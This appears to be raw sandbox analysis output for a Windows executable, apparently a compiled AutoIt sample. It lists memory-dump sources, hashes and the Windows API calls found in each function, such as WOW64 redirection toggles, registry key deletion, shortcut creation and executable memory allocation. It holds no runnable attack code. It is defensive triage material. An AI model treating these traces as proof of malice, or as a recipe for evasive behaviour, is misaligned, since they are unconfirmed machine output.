                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                                        • Instruction ID: 715de3dc67fbb9e11dafa72a1e11b5548bd8272b1895f6184d9cb5e53fffcfc8
                                        • Opcode Fuzzy Hash: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                                        • Instruction Fuzzy Hash: 2CF06231205308AFEB200FA9DD8DE6B3BACFF89768B005426F945D6250CB71DC46EA60
                                        APIs
                                         • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00ED8669
                                         • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00ED8673
                                         • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00ED8682
                                         • RtlAllocateHeap.NTDLL(00000000,?,TokenPrivileges), ref: 00ED8689
                                         • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00ED869F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                                        • Instruction ID: 8c82d4c91fc67f14b25a133d7a295819cc1e64c6a76792c48103806088504e1d
                                        • Opcode Fuzzy Hash: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                                        • Instruction Fuzzy Hash: C4F04F71200308BFEB211FA5EC88E673BACFF89768B100036F955D7250CA61D945EA60
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC6BA
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDC6D1
                                        • MessageBeep.USER32(00000000), ref: 00EDC6E9
                                        • KillTimer.USER32(?,0000040A), ref: 00EDC705
                                        • EndDialog.USER32(?,00000001), ref: 00EDC71F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                                        • Instruction ID: c01cb00878e31f2eea7425bdf5d3cc60148d945a12fd4c834509ab099e271694
                                        • Opcode Fuzzy Hash: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                                        • Instruction Fuzzy Hash: 4801A230400309ABEB315B20DD4EF9677B8FF04B45F14166AF586B15E0DBE1A959DF80
                                        APIs
                                        • EndPath.GDI32(?), ref: 00E813BF
                                        • StrokeAndFillPath.GDI32(?,?,00EBBAD8,00000000,?), ref: 00E813DB
                                        • SelectObject.GDI32(?,00000000), ref: 00E813EE
                                        • DeleteObject.GDI32 ref: 00E81401
                                        • StrokePath.GDI32(?), ref: 00E8141C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                                        • Instruction ID: 5b86d4a05ec0e1a3e682bde979b2ad92ad32568e4435a7e425f3a7469317306b
                                        • Opcode Fuzzy Hash: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                                        • Instruction Fuzzy Hash: A8F0C97400470CEBDB226F26EC0C7583BA9BB22326F04D264E82D959F1C731499AEF51
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ED8E7F
                                        • CloseHandle.KERNEL32(?), ref: 00ED8E94
                                        • CloseHandle.KERNEL32(?), ref: 00ED8E9C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00ED8EA5
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                        • String ID:
                                        • API String ID: 3751786701-0
                                        • Opcode ID: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                                        • Instruction ID: f6fb7602b89906ccef6407152ae8ed2f2a46ab68a82b4ff777b5f62a13e73014
                                        • Opcode Fuzzy Hash: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                                        • Instruction Fuzzy Hash: 66E0E536004209FBDB215FE1EC0C90ABF79FF89722B108230F219C1870CB329468EB90
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00EEC69D
                                        • CoCreateInstance.COMBASE(00F12D6C,00000000,00000001,00F12BDC,?), ref: 00EEC6B5
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • CoUninitialize.COMBASE ref: 00EEC922
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 640794d040a45c5c4bc78bc9a9ed9796c57b42fc077dca949bc6e36d32243610
                                        • Instruction ID: 3938a2af6d042d7c28c17b7536e3d51d7691d732eb31d60d022683c6b638ed11
                                        • Opcode Fuzzy Hash: 640794d040a45c5c4bc78bc9a9ed9796c57b42fc077dca949bc6e36d32243610
                                        • Instruction Fuzzy Hash: 63A14A71508205AFD304FF64C881EABB7E8FF94704F04595DF19AA71A2DB70EA49CB52
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00E87BB1: _memmove.LIBCMT ref: 00E87C0B
                                        • __swprintf.LIBCMT ref: 00E9302D
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E92EC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: ebf2e4b6c9d79327dc93a6fc082df9616dfd2603773c0afc12a58033cb4e9663
                                        • Instruction ID: 952340995fd7ecb3f133c2ae0d1adc7de5b7d7984de8d4ff0d3e80496a0a7d28
                                        • Opcode Fuzzy Hash: ebf2e4b6c9d79327dc93a6fc082df9616dfd2603773c0afc12a58033cb4e9663
                                        • Instruction Fuzzy Hash: 2D917B312083419FCB18EF24D985D6FB7E5EF85744F00295DF49AAB2A1DB20EE45CB52
                                        APIs
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                        • CoInitialize.OLE32(00000000), ref: 00EEBC26
                                        • CoCreateInstance.COMBASE(00F12D6C,00000000,00000001,00F12BDC,?), ref: 00EEBC3F
                                        • CoUninitialize.COMBASE ref: 00EEBC5C
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        • Opcode ID: fdae30aed92fa9177c88d287379be7287ccba0138c0e44852a1aced54018f511
                                        • Instruction ID: ea62b7a747adefd080700efc30f3c8f2f6c7d1a637f3b9e66b99f341b9013f79
                                        • Opcode Fuzzy Hash: fdae30aed92fa9177c88d287379be7287ccba0138c0e44852a1aced54018f511
                                        • Instruction Fuzzy Hash: ADA18A756043459FCB04EF15C884D6ABBE5FF88314F148988F89AAB3A2CB31ED45CB91
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00EA52DD
                                          • Part of subcall function 00EB0340: __87except.LIBCMT ref: 00EB037B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__87except__start
                                        • String ID: pow
                                        • API String ID: 2905807303-2276729525
                                        • Opcode ID: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                                        • Instruction ID: fcf8c71e94b4586a8eb55ff92ae448a0fe42e81f74abd32e64b17be3c653ce34
                                        • Opcode Fuzzy Hash: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                                        • Instruction Fuzzy Hash: 49518B22A0C70586CB107714CA413FF3BE09B56354F20AD68F4A5791E9EF74BCD8AA91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        Similarity
                                        • API ID: _memmove$_free
                                        • String ID: Oa
                                        • API String ID: 2620147621-3945284152
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0F910,00000000,?,?,?,?), ref: 00F07C4E
                                        • GetWindowLongW.USER32 ref: 00F07C6B
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F07C7B
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        APIs
                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F076D0
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F076E4
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F07708
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: SysMonthCal32
                                        • API String ID: 2326795674-1439706946
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F06FAA
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F06FBA
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F06FDF
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F079E1
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F079F6
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F07A03
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC1D88,?), ref: 00EFC312
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFC324
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84C2E), ref: 00E84CA3
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E84CB5
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84CE1,?), ref: 00E84DA2
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84DB4
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 2574300362-1355242751
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84D2E,?,00E84F4F,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84D6F
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84D81
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 2574300362-3689287502
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00F012C1), ref: 00F01080
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F01092
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EF9009,?,00F0F910), ref: 00EF9403
                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EF9415
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetModuleHandleExW$kernel32.dll
                                        • API String ID: 2574300362-199464113
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        • Opcode ID: b71e0f10558ecab087e36a742fe41d015e28a431cc5c2a3ce92ed6a892b6c30b
                                        • Instruction ID: 018bd0e4b3d9680c94969ba9eb50b7c6c621cff783ceb5453d34c3ab04f24986
                                        • Opcode Fuzzy Hash: b71e0f10558ecab087e36a742fe41d015e28a431cc5c2a3ce92ed6a892b6c30b
                                        • Instruction Fuzzy Hash: 3FD01271804118EACB18AAA08E44EF9737CAB0A311F1025D6B506B1441F2369F96AF22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                                        • Instruction ID: 9dbdd675311b8226003f65ecf4debfe5e08de62dda9cd97676c3fab7bc41df33
                                        • Opcode Fuzzy Hash: ba4238cf5b01649e2509ef7440868015469eddbe3e3506c54ed930c4e882e48c
                                        • Instruction Fuzzy Hash: ACC17E75A04216EFCB14CF94C884EAEB7B5FF88714B11959AE885EB350E730DD82DB90
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00EFE3D2
                                        • CharLowerBuffW.USER32(?,?), ref: 00EFE415
                                          • Part of subcall function 00EFDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EFDAD9
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EFE615
                                        • _memmove.LIBCMT ref: 00EFE628
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: c4dc8dca0984edcd8f333d0c1604632225584b98e20a28a0c2ec29940a0a19a8
                                        • Instruction ID: 3adb553fb841cb46d5e12bfc3673ca951a45baf18f2a7b25139635e0ca3e48b5
                                        • Opcode Fuzzy Hash: c4dc8dca0984edcd8f333d0c1604632225584b98e20a28a0c2ec29940a0a19a8
                                        • Instruction Fuzzy Hash: 64C17C716083058FC714DF28C48096ABBE4FF89718F14996EF999EB361D730E906CB82
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00EF83D8
                                        • CoUninitialize.COMBASE ref: 00EF83E3
                                          • Part of subcall function 00EDDA5D: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EDDAC5
                                        • VariantInit.OLEAUT32(?), ref: 00EF83EE
                                        • VariantClear.OLEAUT32(?), ref: 00EF86BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                        • String ID:
                                        • API String ID: 780911581-0
                                        • Opcode ID: 875451c3a63d383eecafb6aa39a5a18f5afaf0be9653842bf24bac4db72caa53
                                        • Instruction ID: 6d538f75383a2a610b1606e7c0a0e7ae630946e7ca60b03cdaaea7a702f00cae
                                        • Opcode Fuzzy Hash: 875451c3a63d383eecafb6aa39a5a18f5afaf0be9653842bf24bac4db72caa53
                                        • Instruction Fuzzy Hash: 0FA15D756047059FCB10EF14C985B6AB7E4BF88314F09645DFA9AAB3A2CB30ED05CB46
                                        APIs
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED7C32
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ED7C4A
                                        • CLSIDFromProgID.COMBASE(?,?), ref: 00ED7C6F
                                        • _memcmp.LIBCMT ref: 00ED7C90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
